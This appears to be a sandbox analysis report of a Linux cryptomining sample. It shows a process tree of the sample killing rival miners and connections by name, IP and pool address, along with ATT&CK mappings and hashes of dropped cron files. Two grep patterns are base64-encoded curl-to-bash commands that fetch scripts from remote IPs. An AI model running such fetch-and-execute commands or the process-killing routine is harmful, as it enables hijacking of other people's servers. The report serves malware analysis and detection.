PID:2168

/bin/grep
grep -v grep
2⤵
PID:2167

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2166

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2181

/usr/bin/awk
awk "\$3>80.0{print \$2}"
2⤵
PID:2180

/bin/grep
grep -v atd
2⤵
PID:2178

/bin/grep
grep -v salt-minions
2⤵
PID:2179

/bin/grep
grep -v apache2
2⤵
PID:2177

/bin/grep
grep -v dblaunched
2⤵
PID:2176

/bin/grep
grep -v dblaunchs
2⤵
PID:2175

/bin/grep
grep -v dblaunch
2⤵
PID:2174

/bin/grep
grep -v root
2⤵
PID:2173

/bin/grep
grep -v grep
2⤵
PID:2172

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2171

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2187

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2186

/bin/grep
grep " ps"
2⤵
PID:2185

/bin/grep
grep -v aux
2⤵
PID:2184

/bin/grep
grep -v grep
2⤵
PID:2183

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2182

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2192

/usr/bin/cut
cut -c 9-15
2⤵
PID:2191

/bin/grep
grep sync_supers
2⤵
PID:2190

/bin/grep
grep -v grep
2⤵
PID:2189

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2188

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2197

/usr/bin/cut
cut -c 9-15
2⤵
PID:2196

/bin/grep
grep cpuset
2⤵
PID:2195

/bin/grep
grep -v grep
2⤵
PID:2194

/bin/ps
ps aux
2⤵
PID:2193

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2203

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2202

/bin/grep
grep "x]"
2⤵
PID:2201

/bin/grep
grep -v aux
2⤵
PID:2200

/bin/grep
grep -v grep
2⤵
PID:2199

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2198

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2209

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2208

/bin/grep
grep "sh] <"
2⤵
PID:2207

/bin/grep
grep -v aux
2⤵
PID:2206

/bin/grep
grep -v grep
2⤵
PID:2205

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2204

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2215

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2214

/bin/grep
grep " \\[]"
2⤵
PID:2213

/bin/grep
grep -v aux
2⤵
PID:2212

/bin/grep
grep -v grep
2⤵
PID:2211

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2210

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2220

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2219

/bin/grep
grep /tmp/l.sh
2⤵
PID:2218

/bin/grep
grep -v grep
2⤵
PID:2217

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2216

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2225

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2224

/bin/grep
grep /tmp/zmcat
2⤵
PID:2223

/bin/grep
grep -v grep
2⤵
PID:2222

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2221

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2230

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2229

/bin/grep
grep hahwNEdB
2⤵
PID:2228

/bin/grep
grep -v grep
2⤵
PID:2227

/bin/ps
ps aux
2⤵
PID:2226

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2235

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2234

/bin/grep
grep CnzFVPLF
2⤵
PID:2233

/bin/grep
grep -v grep
2⤵
PID:2232

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2231

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2240

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2239

/bin/grep
grep CvKzzZLs
2⤵
PID:2238

/bin/grep
grep -v grep
2⤵
PID:2237

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2236

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2245

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2244

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:2243

/bin/grep
grep -v grep
2⤵
PID:2242

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2241

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2250

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2249

/bin/grep
grep /tmp/udevd
2⤵
PID:2248

/bin/grep
grep -v grep
2⤵
PID:2247

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2246

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2255

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2254

/bin/grep
grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
2⤵
PID:2253

/bin/grep
grep -v grep
2⤵
PID:2252

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2251

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2260

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2259

/bin/grep
grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
2⤵
PID:2258

/bin/grep
grep -v grep
2⤵
PID:2257

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2256

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2265

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2264

/bin/grep
grep sustse
2⤵
PID:2263

/bin/grep
grep -v grep
2⤵
PID:2262

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2261

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2270

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2269

/bin/grep
grep sustse3
2⤵
PID:2268

/bin/grep
grep -v grep
2⤵
PID:2267

/bin/ps
ps aux
2⤵
PID:2266

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2276

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2275

/bin/grep
grep wget
2⤵
PID:2274

/bin/grep
grep mr.sh
2⤵
PID:2273

/bin/grep
grep -v grep
2⤵
PID:2272

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2271

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2282

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2281

/bin/grep
grep curl
2⤵
PID:2280

/bin/grep
grep mr.sh
2⤵
PID:2279

/bin/grep
grep -v grep
2⤵
PID:2278

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2277

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2288

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2287

/bin/grep
grep wget
2⤵
PID:2286

/bin/grep
grep 2mr.sh
2⤵
PID:2285

/bin/grep
grep -v grep
2⤵
PID:2284

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2283

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2294

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2293

/bin/grep
grep curl
2⤵
PID:2292

/bin/grep
grep 2mr.sh
2⤵
PID:2291

/bin/grep
grep -v grep
2⤵
PID:2290

/bin/ps
ps aux
2⤵
PID:2289

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2300

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2299

/bin/grep
grep wget
2⤵
PID:2298

/bin/grep
grep cr5.sh
2⤵
PID:2297

/bin/grep
grep -v grep
2⤵
PID:2296

/bin/ps
ps aux
2⤵
PID:2295

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2306

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2305

/bin/grep
grep curl
2⤵
PID:2304

/bin/grep
grep cr5.sh
2⤵
PID:2303

/bin/grep
grep -v grep
2⤵
PID:2302

/bin/ps
ps aux
2⤵
PID:2301

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2312

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2311

/bin/grep
grep wget
2⤵
PID:2310

/bin/grep
grep logo9.jpg
2⤵
PID:2309

/bin/grep
grep -v grep
2⤵
PID:2308

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2307

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2318

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2317

/bin/grep
grep curl
2⤵
PID:2316

/bin/grep
grep logo9.jpg
2⤵
PID:2315

/bin/grep
grep -v grep
2⤵
PID:2314

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2313

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2323

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2322

/bin/grep
grep j2.conf
2⤵
PID:2321

/bin/grep
grep -v grep
2⤵
PID:2320

/bin/ps
ps aux
2⤵
PID:2319

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2329

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2328

/bin/grep
grep wget
2⤵
PID:2327

/bin/grep
grep luk-cpu
2⤵
PID:2326

/bin/grep
grep -v grep
2⤵
PID:2325

/bin/ps
ps aux
2⤵
PID:2324

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2335

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2334

/bin/grep
grep curl
2⤵
PID:2333

/bin/grep
grep luk-cpu
2⤵
PID:2332

/bin/grep
grep -v grep
2⤵
PID:2331

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2330

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2341

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2340

/bin/grep
grep wget
2⤵
PID:2339

/bin/grep
grep ficov
2⤵
PID:2338

/bin/grep
grep -v grep
2⤵
PID:2337

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2336

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2347

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2346

/bin/grep
grep curl
2⤵
PID:2345

/bin/grep
grep ficov
2⤵
PID:2344

/bin/grep
grep -v grep
2⤵
PID:2343

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2342

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2353

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2352

/bin/grep
grep wget
2⤵
PID:2351

/bin/grep
grep he.sh
2⤵
PID:2350

/bin/grep
grep -v grep
2⤵
PID:2349

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2348

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2359

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2358

/bin/grep
grep curl
2⤵
PID:2357

/bin/grep
grep he.sh
2⤵
PID:2356

/bin/grep
grep -v grep
2⤵
PID:2355

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2354

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2365

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2364

/bin/grep
grep wget
2⤵
PID:2363

/bin/grep
grep miner.sh
2⤵
PID:2362

/bin/grep
grep -v grep
2⤵
PID:2361

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2360

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2371

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2370

/bin/grep
grep curl
2⤵
PID:2369

/bin/grep
grep miner.sh
2⤵
PID:2368

/bin/grep
grep -v grep
2⤵
PID:2367

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2366

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2377

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2376

/bin/grep
grep wget
2⤵
PID:2375

/bin/grep
grep nullcrew
2⤵
PID:2374

/bin/grep
grep -v grep
2⤵
PID:2373

/bin/ps
ps aux
2⤵
PID:2372

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2383

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2382

/bin/grep
grep curl
2⤵
PID:2381

/bin/grep
grep nullcrew
2⤵
PID:2380

/bin/grep
grep -v grep
2⤵
PID:2379

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2378

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2388

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2387

/bin/grep
grep 107.174.47.156
2⤵
PID:2386

/bin/grep
grep -v grep
2⤵
PID:2385

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2384

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2393

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2392

/bin/grep
grep 83.220.169.247
2⤵
PID:2391

/bin/grep
grep -v grep
2⤵
PID:2390

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2389

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2398

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2397

/bin/grep
grep 51.38.203.146
2⤵
PID:2396

/bin/grep
grep -v grep
2⤵
PID:2395

/bin/ps
ps aux
2⤵
PID:2394

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2403

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2402

/bin/grep
grep 144.217.45.45
2⤵
PID:2401

/bin/grep
grep -v grep
2⤵
PID:2400

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2399

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2408

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2407

/bin/grep
grep 107.174.47.181
2⤵
PID:2406

/bin/grep
grep -v grep
2⤵
PID:2405

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2404

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2413

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2412

/bin/grep
grep 176.31.6.16
2⤵
PID:2411

/bin/grep
grep -v grep
2⤵
PID:2410

/bin/ps
ps aux
2⤵
PID:2409

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2418

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2417

/bin/grep
grep mine.moneropool.com
2⤵
PID:2416

/bin/grep
grep -v grep
2⤵
PID:2415

/bin/ps
ps auxf
2⤵
PID:2414

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2423

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2422

/bin/grep
grep pool.t00ls.ru
2⤵
PID:2421

/bin/grep
grep -v grep
2⤵
PID:2420

/bin/ps
ps auxf
2⤵
PID:2419

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2428

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2427

/bin/grep
grep xmr.crypto-pool.fr:8080
2⤵
PID:2426

/bin/grep
grep -v grep
2⤵
PID:2425

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:2424

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2433

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2432

/bin/grep
grep xmr.crypto-pool.fr:3333
2⤵
PID:2431

/bin/grep
grep -v grep
2⤵
PID:2430

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2429

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2438

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2437

/bin/grep
grep "[email protected]"
2⤵
PID:2436

/bin/grep
grep -v grep
2⤵
PID:2435

/bin/ps
ps auxf
2⤵
PID:2434

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2443

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2442

/bin/grep
grep monerohash.com
2⤵
PID:2441

/bin/grep
grep -v grep
2⤵
PID:2440

/bin/ps
ps auxf
2⤵
PID:2439

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2448

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2447

/bin/grep
grep /tmp/a7b104c270
2⤵
PID:2446

/bin/grep
grep -v grep
2⤵
PID:2445

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2444

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2453

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2452

/bin/grep
grep xmr.crypto-pool.fr:6666
2⤵
PID:2451

/bin/grep
grep -v grep
2⤵
PID:2450

/bin/ps
ps auxf
2⤵
PID:2449

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2458

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2457

/bin/grep
grep xmr.crypto-pool.fr:7777
2⤵
PID:2456

/bin/grep
grep -v grep
2⤵
PID:2455

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:2454

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2463

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2462

/bin/grep
grep xmr.crypto-pool.fr:443
2⤵
PID:2461

/bin/grep
grep -v grep
2⤵
PID:2460

/bin/ps
ps auxf
2⤵
PID:2459

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2468

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2467

/bin/grep
grep stratum.f2pool.com:8888
2⤵
PID:2466

/bin/grep
grep -v grep
2⤵
PID:2465

/bin/ps
ps auxf
2⤵
PID:2464

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2473

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2472

/bin/grep
grep xmrpool.eu
2⤵
PID:2471

/bin/grep
grep -v grep
2⤵
PID:2470

/bin/ps
ps auxf
2⤵
PID:2469

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2477

/usr/local/sbin/kill
kill -9 2475
3⤵
PID:2478

/usr/local/bin/kill
kill -9 2475
3⤵
PID:2478

/usr/sbin/kill
kill -9 2475
3⤵
PID:2478

/usr/bin/kill
kill -9 2475
3⤵
PID:2478

/sbin/kill
kill -9 2475
3⤵
PID:2478

/bin/kill
kill -9 2475
3⤵
- Reads CPU attributes
PID:2478

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2476

/bin/grep
grep xiaoyao
2⤵
PID:2475

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:2474

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2482

/usr/local/sbin/kill
kill -9 2480
3⤵
PID:2483

/usr/local/bin/kill
kill -9 2480
3⤵
PID:2483

/usr/sbin/kill
kill -9 2480
3⤵
PID:2483

/usr/bin/kill
kill -9 2480
3⤵
PID:2483

/sbin/kill
kill -9 2480
3⤵
PID:2483

/bin/kill
kill -9 2480
3⤵
PID:2483

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2481

/bin/grep
grep xiaoxue
2⤵
PID:2480

/bin/ps
ps auxf
2⤵
PID:2479

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2489

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:2488

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:2487

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:2486

/bin/grep
grep 46.243.253.15
2⤵
PID:2485

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2495

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:2494

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:2493

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:2492

/bin/grep
grep 176.31.6.16
2⤵
PID:2491

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2501

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:2500

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:2499

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:2498

/bin/grep
grep 108.174.197.76
2⤵
PID:2497

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2507

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:2505

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:2506

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:2504

/bin/grep
grep 192.236.161.6
2⤵
PID:2503

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2513

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:2512

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:2511

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:2510

/bin/grep
grep 88.99.242.92
2⤵
PID:2509

/usr/bin/pkill
pkill -f pastebin
2⤵
- Reads runtime system information
PID:2514

/usr/bin/pkill
pkill -f 185.193.127.115
2⤵
PID:2515

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2517

/usr/bin/pgrep
pgrep -f monerohash
2⤵
PID:2516

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2519

/usr/bin/pgrep
pgrep -f L2Jpbi9iYXN
2⤵
- Reads CPU attributes
PID:2518

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2521

/usr/bin/pgrep
pgrep -f xzpauectgr
2⤵
PID:2520

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2523

/usr/bin/pgrep
pgrep -f slxfbkmxtd
2⤵
- Reads runtime system information
PID:2522

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2525

/usr/bin/pgrep
pgrep -f mixtape
2⤵
PID:2524

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2527

/usr/bin/pgrep
pgrep -f addnj
2⤵
PID:2526

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/spool/cron/crontabs/tmp.4uFFl1

Filesize
175B

MD5
ee5b25f56c670666a93fb624a07511f1

SHA1
739387faeb4c10c7d7e2a63654a0cd6f820d0483

SHA256
cf4bbd71ddebdfe86baa3298cd6d560c011dc68c472f467e8658526955d62f4c

SHA512
f624be24ab6c1bce2d2311335cc37cc90207f7e90b8d8be432ba47803f29500213482d5be99dba723bc2f2c42fa27b74642d651499424d521b41c0cfda3136b1

Download Submit
/var/spool/cron/crontabs/tmp.7eBEPe

Filesize
318B

MD5
78d71e2d561bdc85f87856bbd99fc795

SHA1
9bdc07e2262728c96ead8022d1708a423c277777

SHA256
d4628bfdc2760ca46aeeba8d549e3a7ecbaa33d9de70110d21d4bf6e8f0f755a

SHA512
f6fe824adf418b5da084b995cdd7fc190635d609927d54ec864f8f44d51c2fd56f4d7d7df7609d98e4049a8c0494bea94b5cb48a3c7946da7d8c024c74e7e184

Download Submit